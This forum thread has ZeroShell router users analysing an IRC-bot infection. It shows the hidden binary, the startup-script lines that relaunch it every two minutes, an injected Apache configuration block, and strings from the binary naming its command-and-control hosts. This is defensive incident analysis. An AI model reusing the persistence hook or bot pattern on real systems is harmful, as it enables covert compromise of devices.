DoS on DNS Zeroshell: Malware!

Home Page Forums Network Management ZeroShell DoS on DNS Zeroshell: Malware!

This topic contains 2 replies, has 0 voices, and was last updated by  fsala 4 years, 11 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #43775

    fsala
    Member

    Hi all,
    I found a malware on one of our ZS board, that create DoS on Zeroshell DNS with 20k connections on it.

    Full analysis on the italian board (sorry, Italian only, I’ll translate it in a while…): http://www.zeroshell.net/forum/viewtopic.php?t=4115

    #52997

    fsala
    Member

    In short:

    Issue is in a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS :!:.
    File attributes are made to hide it and make deletion harder.


    root@zeroshell DB> ls -al
    total 131252
    drwxr-xr-x 4 root root 4096 Oct 21 17:09 .
    drwxr-xr-x 21 root root 520 Nov 6 12:55 ..
    -rwxr-xr-x 1 root root 23289 Nov 21 2012 .DB.001
    drwxr-xr-x 7 root root 4096 Jul 2 2012 _DB.001
    drwx
    2 root root 16384 Apr 20 2011 lost+found
    -rw-r--r-- 1 root root 134217728 Apr 20 2011 swap-file

    root@zeroshell DB> lsattr .DB.001
    -u--ia
    .DB.001

    To deactivate/rename it:


    killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware

    I analyzed the activity with “strace”: there are thousands of connections to DNS with query for “zeroshell.will.mx” and “zeroshell.samhan.biz” and the binary contains code to activate IRC connection (like a lot of worms).

    Executable starts at boot, inside “Database Update” script (you find it in the Startup/Cron area) and is scheduled to restart every 2 minutes.


    # SSL Security Check
    Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
    if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
    cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
    httpd=$(pidof httpd);kill -HUP $httpd
    fi

    # Database Update
    Database=$(pidof .DB.001)
    if [ -z "$Database" ]; then
    /DB/.DB.001
    fi
    echo "OK"

    It changes also SSL configuration of Apache:


    # C100-Security-Fix-beta12

    SSLOptions +StdEnvVars
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} GET
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(..//?)+ [OR]
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
    RewriteRule .* - [F]

    The binary payload contains this kind of strings (IRC connection, browser emulation…), so I’m sure it’s a malware:


    zeroshell.will.mx
    zeroshell.samhan.biz
    r/usr/dict/words%s : USERID : UNIX : %s
    http://GET /%s HTTP/1.0
    User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
    NICK %s
    HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
    MODE %s -xi
    JOIN %s :%s
    WHO %s
    PONG %s
    352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
    USER %s localhost localhost

    At the moment, I don’t know what was the infection entry point, but I suspect a bug in the openSSL library or in that area…

    Hope it helps!

    Fabrizio Sala/Netdream

    #52998

    bbozo
    Member

    ZS 1 b16
    ZS 2 rc2
    almost all my routers (4 of 5) where infected

    Is there going to be some kind of patch?

    fsala thank you!!!!

    #52999

    drsox
    Member

    I’ve found one of my installations infected with this too.

    Can we try and narrow down what we have in common to work out the infection method.

    I am running Release 2.0.RC2 setup and running since circa. 17/02/2013

    I have (open to the world):
    -Port 80 (the web interface)
    -Port 443 (the web interface)
    -Some LAN-to-LAN (OpenVPN) connections.

    -rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001

    Yet other installations have not been infected.
    OK Installation 1 = Release 2.0.RC2 / Port 80 (Zeroshell server) only open to the world (Port 443 is blocked) running for about a year.

    OK Installation 2 = Release 2.0.RC2 / No ports open to the world running for about 2 months

    OK Installation 3 = Release 2.0.RC1 / Port 80, 443 and SSH open to the world running for about a year

    Both the hosts referenced in the copy I have are the same as the OP.
    zeroshell.will.mx
    and
    zeroshell.samhan.biz
    Luckily both of these don’t resolve and given the date on the infection I presume this must be a very, very old infection that we’ve only just discovered.

    root@zeroshell DB> pstree -Gp
    init(1)─┬─.DB.001(14049)
    root@zeroshell DB> ps aux | grep 14049
    root 7832 0.0 0.0 1944 244 pts/0 S 03:33 0:00 grep 14049
    root 14049 0.0 0.2 2036 640 ? S 2013 64:09 sleep 1800

    I slayed and reloaded the process and it spawned two of itself and instantly tries to resolve zeroshell.will.mx and zeroshell.samhan.biz.
    I forced my network to respond with an IP and the infection then tries to contact zeroshell.will.mx on port 53 using TCP using the IRC protocol:

    NICK WORO
    USER DCRK localhost localhost :VQYJWO

    Tom – http://www.mouselike.org

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.